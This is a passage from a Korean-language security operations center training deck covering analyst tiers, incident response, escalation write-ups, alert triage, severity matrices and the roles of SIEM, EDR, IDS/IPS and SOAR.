산출물	분류 결과 (Benign/Escalate)	조사 보고서, Incident 판정, 대응 권고
도구 활용	SIEM Alert 큐, 기본 검색	SIEM 심화 검색, EDR, 위협 인텔리전스
비유	응급실 접수 간호사	전문의 진단

보강 설명L1과 L2의 차이를 명확히 비교해 보겠습니다. L1은 넓고 빠르게, L2는 좁고 깊게 봅니다. 같은 Alert를 다르게 처리합니다.

L1L2비교

설명 확장

L1 관점에서 이 주제의 목적을 다시 설명하기
L2 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

L1·L2 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

L3: 미래의 탐지를 설계하는 역할

다음에는 더 빨리 잡히도록 탐지와 운영 구조를 개선한다

Part 2

L3의 핵심 업무

탐지 룰/유스케이스 설계 및 튜닝
오탐/미탐 분석
MITRE ATT&CK 기반 탐지 공백 식별
위협 헌팅(Threat Hunting)
파서/필드/데이터 품질 개선

Incident / Lessons Learned

⬇

Detection Gap Analysis

⬇

New Rule / Tuning / Hunt

⬇

Better Alerts ✓

L3의 실제 업무 — "지난달 침해 후 무엇이 달라졌나"

🔴 L3 개입 전

DNS 터널링 공격 — 탐지 룰 없음
공격자 30일간 은밀히 내부 체류
수백 GB 데이터 외부 유출
유출 완료 후 우연히 발견

🟢 L3 대응 이후

DNS 쿼리 패턴 분석 탐지 룰 신규 개발
Threat Hunt로 유사 패턴 전수 조사
MITRE T1071 기반 탐지 로직 구현
동일 기법 재시도 → 2시간 내 탐지

💡 L3는 "지금 공격"을 막는 것이 아니라 "다음 공격을 미리 볼 수 있게" 탐지 눈을 업그레이드합니다. L1·L2가 현재를 지킨다면, L3는 미래를 설계합니다.

IR/CERT: 피해 확산을 멈추는 실행 조직

목표는 예쁘게 분석하는 것이 아니라, 위험을 통제하고 정상 상태로 복구하는 것

Part 2

🛑

Contain

계정 잠금
호스트 격리
IP 차단

🧹

Eradicate

악성 프로세스 제거
원인 제거

🔄

Recover

서비스 정상화
재발 방지

📋

Improve

사후 분석
개선 연결

NIST SP 800-61r3 관점: Incident Response는 사이버 리스크 관리의 일부이며, 탐지 → 대응 → 복구 → 개선의 연속 흐름으로 운영한다

랜섬웨어 발생 시 IR팀 실제 24시간 대응 예시

T+0hL1이 "파일 대량 암호화" Alert 수신 → L2 에스컬레이션 → IR팀 즉시 소집 T+1h억제: 감염 서버 네트워크 격리, 공유 폴더 접근 차단, 백업 서버 연결 분리 T+3h범위 파악: 전체 네트워크 스캔 → 감염 장비 17대 확인, 측면이동 경로 재구성 T+6h증거 보전: 포렌식 이미지 수집, 메모리 덤프, 이벤트 로그 보존 (법적 절차 대비) T+12h복구 시작: 백업에서 우선순위 시스템 복구, 비즈니스 영향도 낮은 순서로 재개 T+24h임시 운영 재개: 핵심 서비스 복구 완료. 전체 복구는 72시간 목표로 계속 진행.

⚠️ IR팀 없이 랜섬웨어를 맞으면: 평균 복구 기간 21일, 평균 피해액 $1.85M (Sophos 2024). IR팀이 있으면 이 수치가 절반 이하로 줄어듭니다.

좋은 SOC는 핸드오프가 끊기지 않는다

경고를 넘기는 것만으로 부족 — 판단 근거와 다음 행동이 함께 넘어가야 한다

Part 2

나쁜 에스컬레이션

                    "이상 로그인 같음. 확인 필요"
                

→ 다음 팀이 다시 처음부터 봐야 함

좋은 에스컬레이션

                    "해외 IP(SG), 신규 디바이스, MFA 성공 후 12분 내 85개 문서 다운로드 확인. 재택/VPN 예외 없음. 계정 잠금 및 사용자 확인 권고"
                

→ 다음 팀이 바로 행동 가능

SOC의 문서화와 티켓 품질은 부수 업무가 아니라 핵심 운영 역량이다

보강 설명분석이 좋아도 핸드오프가 나쁘면 운영 품질은 떨어집니다. 예를 들어 이상 로그인 같음. 확인 필요 정도로 넘기면 다음 팀은 다시 처음부터 봐야 합니다. 반면 구체적인 사실과 권고를 함께 넘기면…

핸드오프티켓 품질근거

설명 확장

핸드오프 관점에서 이 주제의 목적을 다시 설명하기
티켓 품질 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

핸드오프·티켓 품질 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

에스컬레이션 템플릿

이 구조에 맞춰 작성하면 다음 팀이 바로 움직일 수 있다

Part 2

Alert ID

#SOC-2026-0319-0142

시간

2026-03-19 02:11 KST

관측 사실

domain_admin01 → DC01 로그인 (출발지: Helpdesk-PC-07)

이상 근거

비인가 시간대, PowerShell 실행, 신규 관리자 2개 생성, 승인 이력 없음

영향 범위

Domain Controller, 도메인 전체 계정에 영향 가능

Severity

CRITICAL

권고 조치

계정 즉시 통제, 호스트 격리, IR/CERT 호출, 로그 증적 보존

보강 설명좋은 에스컬레이션은 템플릿을 사용합니다. 이 구조에 맞춰 작성하면 다음 팀이 바로 움직일 수 있습니다.

에스컬레이션템플릿문서화

설명 확장

에스컬레이션 관점에서 이 주제의 목적을 다시 설명하기
템플릿 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

에스컬레이션·템플릿 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

NIST CSF 2.0 × SOC 역할 매핑

각 역할이 프레임워크의 어디에 해당하는지 보기

Part 2

NIST CSF 기능	L1	L2	L3	IR/CERT
Detect (탐지)	●●●	●●	●●●	●
Respond (대응)	●	●●	●	●●●
Recover (복구)	—	●	●	●●●
Identify (식별)	—	●	●●	●

●●● = 핵심 역할 · ●● = 주요 참여 · ● = 부분 참여 · — = 직접 관여 낮음

보강 설명NIST CSF 2.0과 SOC 역할을 매핑해 보면, L1은 Detect의 최전선, L2는 Detect와 Respond의 교차점, IR은 Respond와 Recover를 담당합니다.

NIST CSF매핑역할

설명 확장

NIST CSF가 해결하려는 문제를 먼저 정리하기
매핑 관련 기능과 경계 지점을 구분하기
단독 기능보다 운영 흐름 안에서 바라보기

실무 포인트

입력 데이터·출력 결과·담당 역할을 분리해서 보기
탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
정책·자동화가 없을 때 생기는 공백을 생각하기

예시 연결

콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
오탐/정탐 두 경우를 모두 떠올리기
NIST CSF 관련 사용 사례를 한 가지 말로 정리하기

Check Point: Part 2 복습

SOC 운영 구조에 대해 스스로 답해 보세요

Part 2 · 퀴즈

스스로 답해 보세요

Q1. L1과 L2의 가장 큰 차이는 무엇인가?

Q2. L3(Detection Engineering)가 강한 SOC의 특징은?

Q3. IR의 첫 번째 목표는 "예쁘게 분석하는 것"인가?

Q4. 좋은 에스컬레이션에 반드시 포함되어야 하는 것은?

Q5. "이상 로그인 같음. 확인 필요"가 나쁜 에스컬레이션인 이유는?

답변에 꼭 들어가면 좋은 핵심 키워드

L1 vs L2
넓고 빠른 분류 vs 좁고 깊은 조사 — 같은 Alert도 보는 깊이가 다르다

좋은 에스컬레이션
사실 + 이상 근거 + 영향 범위 + 권고 조치가 함께 있어야 다음 팀이 바로 움직일 수 있다

스스로 체크해볼 비교 질문

누가 무엇을 결정하는가?
L1은 처리 여부를 가르고, L2는 실제 무슨 일이 일어났는지와 영향 범위를 설명한다

핸드오프가 왜 중요한가?
다음 팀이 다시 처음부터 보지 않도록 판단 근거와 아직 모르는 점까지 같이 넘겨야 한다

보강 설명핵심 개념을 짧게 꺼내보는 점검 구간입니다. 정답 여부보다 설명 순서와 근거가 더 중요합니다.

퀴즈복습

답변 힌트

핵심 정의를 한 문장으로 먼저 답하기
예시는 1개만 붙여 간결하게 설명하기
용어 차이는 목적과 역할로 구분해 말하기

생각 순서

사실 → 맥락 → 판단 순서를 유지하기
오탐 가능성과 추가 확인 항목을 함께 적기
마지막은 다음 조치 제안으로 마무리하기

토론 포인트

다른 역할이라면 같은 질문을 어떻게 볼지
판단을 바꿀 추가 데이터가 무엇인지
실무에서의 영향과 우선순위까지 연결하기

Part 2 요약 — SOC 운영 구조

Part 2 · 요약

✓ L1: 빠르고 일관된 분류 — SOC 품질의 관문

✓ L2: 가설 기반 타임라인 재구성 — 디지털 수사관

✓ L3: 미래의 탐지 설계 — Detection Engineering

✓ IR: 위험 통제 + 복구 — 실행 조직

✓ 핸드오프: 판단 근거 + 다음 행동이 함께 넘어가야 운영이 연결된다

역할은 나뉘어도 운영은 하나의 흐름으로 이어진다

L1
분류

→

L2
조사

→

L3
개선

→

IR
대응

핸드오프가 선명할수록 L2/IR는 다시 처음부터 조사하지 않고, L3는 다음 탐지를 더 빠르게 개선할 수 있다.

보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.

L1L2L3

핵심 회수

L1·L2 핵심어를 세 문장으로 압축해 보기
정의보다 역할·가치·흐름을 연결해서 설명하기
비슷한 개념과의 차이를 짧게 대비해 보기

실무 연결

현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
판단이 필요한 순간과 비용을 함께 생각하기
오탐과 과소판단이 만드는 리스크를 비교하기

복습 체크

혼자 설명 가능한 핵심 용어 3개 고르기
다음 모듈과 이어질 질문 1개 만들어 보기
실무 문장으로 바꾸어 다시 써 보기

이벤트 흐름과 Alert 판단

Log → Event → Alert → Incident 구분과 Triage 방법

약 30분

Log Event Alert Incident Triage

모든 Alert가 Incident는 아니다

Raw data가 운영 판단 객체가 되기까지는 단계가 있다

Part 3

📄

Log

시스템이 남긴
원시 기록

📋

Event

의미를 해석한
단위 행위

🔔

Alert

탐지 로직이 주의를
요구한 상태

🚨

Incident

실제 대응이 필요한
보안 사건

"로그는 사실이고, Alert는 가설이며, Incident는 대응이 필요한 운영 결론이다."

Log ≒ 목격자 진술
"22:14에 정장 입은 남성이 1층 엘리베이터를 탔다" — 사실이지만 의미는 없다

Event ≒ 상황 파악
"엘리베이터가 금고실 층에서 멈췄고 신분 미확인 방문자다" — 의미를 붙였다

Alert ≒ 의심 신고
"출입 권한이 없는 층에서 탐지됨 — 확인 필요" — 경비실에 신호가 간다

Incident ≒ 대응 결정
"확인 결과 무단 침입 → 경비 출동 + 경찰 신고 + CCTV 확보" — 행동이 따른다

편의점 CCTV 비유로 보는 퍼널

📹

Log

CCTV 24시간 전원 기록
(입장객 전원)

1,000,000건/일

🎯

Event

규칙에 해당 행동 선별
(야간 방문자)

50,000건/일

🔔

Alert

CCTV가 경보 울림
(마스크 착용자)

500건/일

🚨

Incident

경비원이 실제 절도 확인
(분석가 판단)

3~5건/일

💡 Alert → Incident 전환은 사람 분석가의 판단이 들어가는 지점입니다. "이것이 진짜 위협인가"를 결정하는 것은 여전히 사람입니다.

하나의 로그인 이상 행위를 단계별로 보면

같은 흔적도 단계가 올라갈수록 데이터에서 의미로 압축된다

Part 3

Log

22:14:09 / user=finance01 / src_ip=203.x.x.x / country=SG / result=success

⬇

Event

"해외 국가에서의 성공 로그인"

⬇

Alert

"사용자 평소 접속국가와 다른 위치에서 로그인 성공" — 가설

⬇

Incident

"신규 디바이스 + MFA 직후 대량 다운로드 + 사용자 미확인 → 계정 탈취 의심" — 대응 결정

이 단계 전환에서 "사람의 판단"이 개입하는 지점

Log → Event: 시스템이 자동으로 정규화. "22:14 KR_IP 로그인 성공"이 "finance01의 해외 국가 로그인 성공"으로 해석된다.

Alert → Incident: 사람(분석가)의 판단이 반드시 필요. "MFA 성공했지만 신규 디바이스 + 대량 다운로드"라는 맥락 해석은 시스템이 자동으로 할 수 없다.

로그를 읽는 기초: 핵심 필드 5가지

시간 · 사용자 · 행위 · 출발지 · 결과 — 이것만 먼저 파악

Part 3

[2026-03-19T22:14:09Z]
user=finance01
action=login
src_ip=203.0.113.42
result=success
                src_country=SG device=new_browser mfa=passed
            

🕐 When (시간)

22:14:09 — 야간 시간대

👤 Who (사용자)

finance01 — 재무 계정

🎯 What (행위)

📍 Where (출발지)

203.0.113.42 / Singapore — 해외 IP

✅ Result (결과)

success — 로그인 성공

입문자 팁: 로그를 처음 볼 때 이 순서로 읽자

1. 시간: 업무 시간인가? 야간·주말인가?
2. 누가: 관리자/VIP/일반 사용자?
3. 무엇을: 로그인? 파일 삭제? 대량 다운로드?

4. 어디서: 내부/해외/알려진 VPN?
5. 결과: 성공/실패/몇 번?
→ 5개만 파악해도 80%의 상황을 빠르게 요약할 수 있다.

숫자로 보는 Log → Incident 퍼널

대량의 원시 데이터에서 실제 Incident까지 걸러지는 과정

Part 3

1,000,000+

Raw Logs / day

50,000

Events (정규화된 행위)

500

Alerts (탐지 로직 트리거)

Investigated (L2 조사)

3~5

Incidents / day

* 숫자는 교육용 예시이며, 조직 규모와 환경에 따라 다릅니다

왜 1,000,000개의 로그에서 3~5개의 Incident만 나오는가?

로그 → 이벤트 (50,000)

대부분의 로그는 "정상 로그인", "파일 열기"처럼 의미가 없는 원시 기록. 이 중 "로그인 실패 반복", "야간 접속" 등 의미 있는 행위만 이벤트로 필터링.

이벤트 → Alert (500)

이벤트 중 탐지 룰에 걸리는 것만 Alert가 됨. 하지만 룰이 너무 넓으면 오탐이 많아지고, 너무 좁으면 실제 공격을 놓친다. 룰 품질이 핵심.

Alert → Incident (3~5)

대부분의 Alert는 오탐이거나 정상 행위. L1이 Triage를 거쳐 진짜 조사가 필요한 케이스만 추리면 하루 3~5건 수준. 이것이 SOC가 "가치 있는 판단"을 하는 이유.

오탐(False Positive)의 실제 비용

오탐이 많으면 진짜 위험을 놓친다 — Alert Fatigue

Part 3

Alert Fatigue란?

너무 많은 알림에 지쳐 진짜 위험도 무시하게 되는 현상
분석가가 기계적으로 "닫기"를 반복
결과: 실제 Incident를 놓침

좋은 Alert는 많이 울리는 Alert가 아니라,
다음 행동을 이끌어내는 Alert이다

비유: 화재 경보기가 하루 100번 울리는 건물

처음엔 모두 뛰어나가지만, 1주일 후엔 경보 소리를 들어도 "또 오작동이겠지"하며 자리를 지킨다. 그러다 진짜 화재가 났을 때 아무도 반응하지 않는다. SOC의 Alert Fatigue가 바로 이 상황이다. 적은 Alert, 높은 신뢰도가 목표다.

70%+

보안 팀이 "Alert 과부하"를 경험

45%

Alert 중 무시되거나 미조사

오탐 비용 계산 — 연간으로 보면 얼마나 될까?

📊 일반적인 SOC 운영 현황

일평균 Alert: 1,000 ~ 10,000건
오탐 비율: 평균 45~65%
Alert 1건 분석 평균: 약 10분
L1 분석가 시급 환산: 3~5만원

💸 연간 오탐 처리 비용 계산

                    일 1,000건 × 50% 오탐 = 500건/일

                    500건 × 10분 = 5,000분/일

                    5,000분 ÷ 60 ≈ 83시간/일

                    83h × 4만원 = 332만원/일 낭비

                    연간: 약 12억원 (오탐만으로)

⚠️ 이래서 탐지 룰 튜닝이 중요합니다. 오탐을 10%만 줄여도 연간 1.2억 절감 + 분석가 번아웃 예방 + 진짜 위협 대응 시간 확보.

Alert Triage의 네 가지 질문

사실인가 → 정상인가 → 얼마나 위험한가 → 지금 조치가 필요한가

Part 3

데이터는 신뢰할 수 있는가?
오류/중복이면 → 닫기 또는 병합

닫기

알려진 정상 행위인가?
승인된 변경/정상 운영이면 → Benign / 예외처리

Benign

중요 자산/중요 계정과 관련 있는가?
민감 자산/고위험 징후면 → L2 에스컬레이션

Escalate

즉시 대응이 필요한 징후가 있는가?
확산/파괴 가능성이면 → IR 즉시 통보

IR 호출

Severity 판단축: 사용자 중요도 · 자산 중요도 · 행위 이상성 · 확산 가능성 · 증거 강도

4가지 질문을 실제 Alert에 적용하면

질문 1: 데이터 신뢰성

"로그인 실패 1,000회" Alert → 해당 서버가 어젯밤 점검 중이었다는 기록 확인 → 정상 작동 오류 → 닫기

질문 2: 정상 여부

"개발 서버에 새 포트 오픈" Alert → 변경 관리 시스템에 해당 날짜 배포 승인 기록 확인 → Benign, 예외처리

질문 3: 자산 중요도

"해외 IP 접속" Alert → 계정 확인 → domain_admin (최고 권한 계정) → 자산 중요도 최상 → 즉시 에스컬레이션

질문 4: 즉시 조치 필요성

"랜섬웨어 의심 파일" Alert → EDR에서 암호화 프로세스 진행 중 확인 → 초 단위 확산 가능 → 즉시 IR 호출 + 격리

좋은 분석 문장은 사실 + 해석 + 조치 제안으로 끝난다

"수상함"이라고 쓰는 것은 분석이 아니라 감상이다

Part 3

나쁜 예

"이상 로그인 같음"

좋은 예

"해외 신규 IP에서 재무계정 로그인 후 15분 내 대량 다운로드가 확인되어 계정 탈취 가능성이 높음. 사용자 확인 및 세션 차단 권고"

Fact
관측 사실

Reason
왜 의심되는가

Impact
영향 범위

Action
권고 조치

운영 가능한 판단문

왜 문서화된 판단문이 중요한가?

인수인계

야간 L1이 발견한 내용을 주간 L2가 이어받을 때, 구두가 아닌 문서로 남아야 정보 손실이 없다

감사·증거

사고 후 "언제 누가 무엇을 보고 어떤 판단을 했는가"가 법적·규제적 증거가 된다

개선 루프

잘 쓴 판단문이 쌓이면 "우리가 놓친 패턴"을 발견하고 탐지 룰을 개선하는 데이터가 된다

보강 설명SOC 분석이 어려운 이유 중 하나는, 머릿속으로는 이해했지만 문장으로 남기지 못하는 경우가 많기 때문입니다. 운영 조직에서는 구두 느낌보다 문서화된 판단이 중요합니다. 이 템플릿은 오늘…

FactWhy suspiciousImpact

설명 확장

Fact 관점에서 이 주제의 목적을 다시 설명하기
Why suspicious 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

Fact·Why suspicious 핵심어를 한 문장으로 정리하기
실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

판단문 실전 예시

실제 분석가가 작성하는 판단문의 구조

Part 3

📋 Alert: 해외 IP 로그인 성공 — finance01

Fact:

22:14 Singapore IP에서 finance01 계정 로그인 성공. 신규 브라우저 세션. MFA 성공. 직후 12분 내 340개 문서 조회, 85개 다운로드.

Reason:

사용자는 현재 국내 근무 중이며 출장 등록 없음. 평소 접속 국가(KR)와 다름. 신규 디바이스. 야간 시간대. 대량 데이터 접근.

Impact:

재무 부서 계정으로 85개 문서가 다운로드됨. 문서의 기밀 등급 및 범위 확인 필요.

Action:

사용자 본인 확인 → 세션 즉시 종료 → 비밀번호 재설정 → 다운로드 문서 범위 조사 → L2/IR 에스컬레이션

Verdict: HIGH — 계정 탈취 또는 세션 악용 가능성 높음. 즉시 L2/IR 검토 필요.

이 판단문의 각 요소가 왜 중요한가

Fact:

관측 가능한 객관적 사실만 작성. "의심스럽다"는 표현 금지. "22:14 Singapore IP에서 로그인 성공"처럼 로그에 있는 그대로를 쓴다. 나중에 감사 증거로 사용된다.

Reason:

왜 이것이 의심되는지의 논리적 근거. "해외이므로 이상하다"가 아니라 "출장 등록 없음 + 신규 디바이스 + 평소 접속 국가 KR과 다름" 등 복수의 이상 신호를 나열한다.

Impact:

피해의 범위와 민감도. "85개 문서"가 일반 파일인지 기밀 계약서인지에 따라 Impact가 달라진다. 범위 파악이 안 됐다면 "범위 확인 필요"로 명시한다.

Action:

다음에 누가 무엇을 해야 하는지를 명확히. "확인 요청"이 아니라 "사용자 본인에게 연락 + 세션 즉시 종료 + 비밀번호 재설정 검토 + L2/IR 에스컬레이션"처럼 구체적이어야 한다.

Severity 판단 매트릭스

자산 중요도 × 행위 이상성으로 우선순위를 판단한다

Part 3

	행위 이상성 낮음	행위 이상성 중간	행위 이상성 높음
자산 중요도 높음 (DC, VIP, 재무)	Medium	High	Critical
자산 중요도 중간 (업무 서버, 일반 관리자)	Low	Medium	High
자산 중요도 낮음 (일반 사용자 PC)	Info	Low	Medium

* 이 매트릭스는 교육용 단순화 모델이며, 실제 운영 시 조직별 기준에 맞춰 세분화해야 합니다

매트릭스 적용 예시 3가지

Low 예시: 일반 직원 PC에서 인터넷 브라우저로 알려진 악성 광고 URL 클릭 → 자산 중요도 낮음 + 행위 이상성 낮음(광고 클릭은 흔함) → Low. 사용자에게 주의 안내 후 Close.

High 예시: 재무 팀장 계정(자산 중요도 높음)으로 해외 IP 로그인 후 파일 다운로드(행위 이상성 중간) → High. 즉시 사용자 확인 + L2 에스컬레이션.

Critical 예시: Domain Controller(자산 중요도 최상)에 새벽 2시에 domain_admin 계정으로 PowerShell 실행 + 신규 관리자 계정 생성(행위 이상성 높음) → Critical. 즉시 IR 호출 + 격리 검토.

Check Point: Part 3 복습

이벤트 흐름과 Alert 판단에 대해 점검합니다

Part 3 · 퀴즈

스스로 답해 보세요

Q1. Log와 Event의 차이는 무엇인가?

Q2. Alert가 곧바로 Incident가 되지 않는 이유는?

Q3. Alert Triage에서 가장 먼저 확인해야 할 것은?

Q4. "수상함"이 나쁜 분석 문장인 이유는?

Q5. 좋은 판단문의 4가지 구성 요소는?

보강 설명핵심 개념을 짧게 꺼내보는 점검 구간입니다. 정답 여부보다 설명 순서와 근거가 더 중요합니다.

퀴즈복습

답변 힌트

핵심 정의를 한 문장으로 먼저 답하기
예시는 1개만 붙여 간결하게 설명하기
용어 차이는 목적과 역할로 구분해 말하기

생각 순서

사실 → 맥락 → 판단 순서를 유지하기
오탐 가능성과 추가 확인 항목을 함께 적기
마지막은 다음 조치 제안으로 마무리하기

토론 포인트

다른 역할이라면 같은 질문을 어떻게 볼지
판단을 바꿀 추가 데이터가 무엇인지
실무에서의 영향과 우선순위까지 연결하기

Part 3 요약 — 이벤트 흐름과 Alert 판단

Part 3 · 요약

✓ Log: 시스템이 남긴 원시 기록 — 사실

✓ Event: 의미를 해석한 단위 행위 — 의미 부여

✓ Alert: 탐지 로직이 주의를 요구한 상태 — 가설

✓ Incident: 실제 대응이 필요한 보안 사건 — 운영 결론

✓ 판단문: Fact + Reason + Impact + Action = 운영 가능한 판단

입문자 3대 착각 — 지금 해소해 두자

착각 1: "Alert = 공격"

Alert는 "조사가 필요한 가설"이다. 대부분(~80%)은 오탐이거나 정상 행위다. 판단하기 전에 컨텍스트를 확인해야 한다.

착각 2: "MFA 성공 = 안전"

AiTM 피싱, MFA Fatigue, 세션 토큰 탈취로 MFA를 우회하는 공격이 증가하고 있다. MFA 성공은 "계정 소유자가 로그인했을 가능성"일 뿐이다.

착각 3: "로그인 성공 = 정상"

공격자가 탈취한 계정으로 로그인하면 시스템 입장에선 "정상 로그인"이다. 로그인 후 행위(파일 조회, 다운로드, 권한 변경 등)가 진짜 판단 기준이다.

보안 도구 이해

SIEM · EDR · IDS/IPS · SOAR의 역할과 연동

약 35분

SIEM EDR IDS/IPS SOAR 연동 구조

SOC가 쓰는 주요 보안 도구 맵

결국 "넓게 보는 도구", "깊게 보는 도구", "자동화하는 도구"로 정리할 수 있다

Part 4

도구	핵심 역할	비유	시야 범위
SIEM	로그 수집, 정규화, 상관분석, 탐지	관제탑 레이더	전체 인프라 (넓게)
EDR	엔드포인트 행위 가시성, 격리/조치	CCTV + 경비원	호스트 내부 (깊게)
IDS/IPS	네트워크 위협 탐지 및 차단	교통 감시 카메라	네트워크 흐름
SOAR	플레이북 기반 자동화, 오케스트레이션	자동화 로봇 팔	도구 간 연결
Case/Ticket	협업과 추적 관리	수사 기록 장부	운영 문서화

보강 설명초심자에게는 보안 도구가 서로 비슷해 보이지만, 실제 역할은 상당히 다릅니다. SIEM은 넓게 보고, EDR은 깊게 보고, IDS/IPS는 네트워크를 감시하고, SOAR는 여러 도구를 묶어…

SIEMEDRIDS/IPS

설명 확장

SIEM가 해결하려는 문제를 먼저 정리하기
EDR 관련 기능과 경계 지점을 구분하기
단독 기능보다 운영 흐름 안에서 바라보기

실무 포인트

입력 데이터·출력 결과·담당 역할을 분리해서 보기
탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
정책·자동화가 없을 때 생기는 공백을 생각하기

예시 연결

콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
오탐/정탐 두 경우를 모두 떠올리기
SIEM 관련 사용 사례를 한 가지 말로 정리하기

SIEM: SOC의 중심 관제 플랫폼

로그 보관함이 아니라, 다양한 흔적을 모아 상관분석하고 탐지를 만드는 플랫폼

Part 4

SIEM이 하는 일

다양한 로그 수집 및 중앙화
필드 정규화 및 파싱
검색(Search)과 상관분석(Correlation)
탐지 룰 기반 Alert 생성
대시보드 / 리포트 / Case 연계

SIEM이 잘 답하는 질문

같은 행위가 다른 자산에도 있었는가?

이 계정은 최근 어떤 시스템에 접근했는가?

이 IOC와 연관된 로그가 더 있는가?

⚠ 로그 품질이 나쁘면 탐지도 나쁘다
⚠ 컨텍스트 없는 Alert는 소음이 된다

SIEM 검색 쿼리 개념 예시


                        user="finance01" AND country!="KR" AND action="login_success"

                        → 재무계정이 한국 이외 국가에서 로그인 성공한 모든 기록을 가져온다

이런 검색 패턴을 "탐지 룰"로 저장하면 자동으로 Alert가 생성된다

보강 설명SIEM은 SOC에서 가장 자주 보게 되는 핵심 플랫폼입니다. 중요한 점은 SIEM이 마법 상자가 아니라는 것입니다. 로그 품질이 나쁘면 탐지도 나쁘고, 컨텍스트가 없으면 Alert는 많아도…

중앙화정규화상관분석

설명 확장

중앙화가 해결하려는 문제를 먼저 정리하기
정규화 관련 기능과 경계 지점을 구분하기
단독 기능보다 운영 흐름 안에서 바라보기

실무 포인트

입력 데이터·출력 결과·담당 역할을 분리해서 보기
탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
정책·자동화가 없을 때 생기는 공백을 생각하기

예시 연결

콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
오탐/정탐 두 경우를 모두 떠올리기
중앙화 관련 사용 사례를 한 가지 말로 정리하기

EDR은 호스트를 깊게, IDS/IPS는 네트워크를 본다

서로 대체재가 아니라 서로 다른 관찰 지점을 갖는 센서

Part 4

EDR

프로세스 트리, 명령행
파일 생성/삭제
레지스트리, 서비스 변경
호스트 격리·파일 차단 가능

호스트 내부 · 깊은 분석

IDS

네트워크 패턴 기반 탐지
악성 트래픽, 시그니처
비정상 통신 탐지
탐지 중심 (차단 X)

네트워크 · 탐지 전용

IPS

탐지 + 정책 기반 차단
Inline 장비 특성
오탐 시 정상 트래픽 차단 위험
오탐 관리가 핵심

네트워크 · 탐지+차단

어떤 상황에서 어떤 도구를 주로 보나?

EDR: 악성코드 감염 의심 — 어떤 프로세스가 실행됐고 어떤 파일을 만들었는가 → 해당 호스트를 즉시 네트워크 격리하는 것도 EDR로 가능

IDS: 내부 서버에서 외부로 비정상 대량 트래픽 → IDS Alert 확인 후 분석가가 SIEM에서 출처 계정/프로세스를 연결해 조사

IPS: 알려진 Exploit 패킷이 차단됐다는 로그 → "이미 차단됐으니 끝"이 아니라 "왜 이 공격이 왔는가, 다른 경로는 없는가"를 SIEM으로 연계 분석

SOAR: 자동화와 오케스트레이션의 엔진

사람을 없애는 도구가 아니라, 반복 작업을 빠르고 일관되게 실행하게 만드는 도구

Part 4

SOAR 핵심

여러 보안 도구와 시스템을 연결
반복 업무를 플레이북으로 자동화
자동 보강(Enrichment), 티켓 생성, 조치 수행
승인 기반(Human-in-the-loop) 워크플로

⚠ "나쁜 프로세스를 자동화하면 더 빨리 망가진다"
⚠ "SOAR 도입 = 사람 필요 없음"은 오해

🔔 Alert 발생

⬇

📊 Enrichment (자동 보강)

⬇ 조건 분기

낮은 위험
→ 티켓 생성

중간 위험
→ 승인 요청

높은 위험
→ 자동 격리

보강 설명SOAR를 도입한다고 해서 사람이 필요 없어지는 것은 아닙니다. 오히려 잘 정리된 프로세스와 판단 기준이 있어야 자동화가 안전하게 동작합니다. 현업에서는 나쁜 프로세스를 자동화하면 더 빨리…

PlaybookOrchestrationAutomation

설명 확장

Playbook가 해결하려는 문제를 먼저 정리하기
Orchestration 관련 기능과 경계 지점을 구분하기
단독 기능보다 운영 흐름 안에서 바라보기

실무 포인트

입력 데이터·출력 결과·담당 역할을 분리해서 보기
탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
정책·자동화가 없을 때 생기는 공백을 생각하기

예시 연결

콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
오탐/정탐 두 경우를 모두 떠올리기
Playbook 관련 사용 사례를 한 가지 말로 정리하기

현대 SOC는 연결성으로 작동한다

단일 툴보다 중요한 것은 데이터 → 분석 → 대응이 하나의 운영 체인으로 이어지는가

Part 4

Data Sources

→

SIEM Detection

→

Analyst Triage

→

EDR/Net
Deep Dive

→

SOAR/IR
Action

→

Case Closure

Case Closure → Rule Tuning / Lessons Learned → 다시 Detection으로 환류

이 연결성이 강할수록 MTTD와 MTTR을 줄이기 쉬워진다

보강 설명실제 SOC에서 한 Alert를 처리하는 과정을 생각해 보면, SIEM이 이상 징후를 잡고, 분석가는 EDR로 호스트를 들여다보며, SOAR가 관련 컨텍스트를 자동으로 수집하거나 조치를…

연결성운영 체인Case

설명 확장

연결성 관점에서 이 주제의 목적을 다시 설명하기
운영 체인 관련 현장 장면을 함께 떠올리기
정의보다 왜 필요한지부터 말해 보기

판단 포인트

무슨 흔적을 보고 무엇을 결론내는지 구분하기
추가 확인할 로그·담당자·시간축을 메모하기
오탐 가능성과 리스크를 같이 적어 두기

학습 요소

연결성·운영 체인 핵심어를 한 문장으로 정리하기
